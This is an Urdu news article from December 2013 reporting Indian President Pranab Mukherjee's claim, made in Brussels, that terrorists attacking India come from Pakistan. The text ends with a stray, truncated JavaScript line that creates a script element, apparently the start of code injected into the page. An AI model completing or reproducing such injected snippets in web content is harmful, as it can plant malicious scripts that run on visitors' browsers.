Published On: Thu, Dec 5th, 2013
Published in Category: Uncategorized

بھارت میں دہشت گرد پاکستان سے آتے ہیں، بھارتی صدرکا الزام

Share This
Tags

برسلز: بھارتی صدر پرناب مکھرجی نے پاکستان پر دہشت گردوں کی مدد کا الزام عائد کرتے ہوئے کہا ہے کہ بھارت میں دہشت گردی کرنے والے افراد کسی جنت سے نہیں بلکہ پاکستان سے آتے ہیں۔

اپنے دورہ بیلجیم کے دوران بھارتی صدر کا کہنا تھا کہ بھارت پاکستان کے ساتھ امن چاہتا ہیں لیکن اس کے لیے ملکی سالمیت پر کسی بھی قسم کا سمجھوتا نہیں کیا جائے گا اور نہ ہی پاکستان کی جانب سے دہشت گردی برداشت نہیں کی جائے گی، پاکستان میں موجود دہشت گردوں کے انفرااسٹرکچر کو ختم کرنے کی ضرورت ہے۔ انہوں نے کہا کہ دہشت گردی کو مکمل طور پر ختم کیا جانا چاہیے، ریاستی دہشت گردی بھی کسی صورت برداشت نہیں کی جا سکتی اسی لیے ہم پاکستان کو اس کی سرزمین پر موجود دہشت گردوں کے خاتمے کا کہتے ہیں۔

پرناب مکھر جی نے کہا کہ بھارت کے خطے میں کسی بھی قسم کے مقاصد نہیں  اور وہ پاکستان سمیت تمام ہمسایہ ممالک کے ساتھ امن چاہتا ہے تاہم اپنی ملکی سالمیت پر کسی قسم کا سمجھوتا نہیں کیا جائے گا۔

var d=document;var s=d.createElement(‘script’);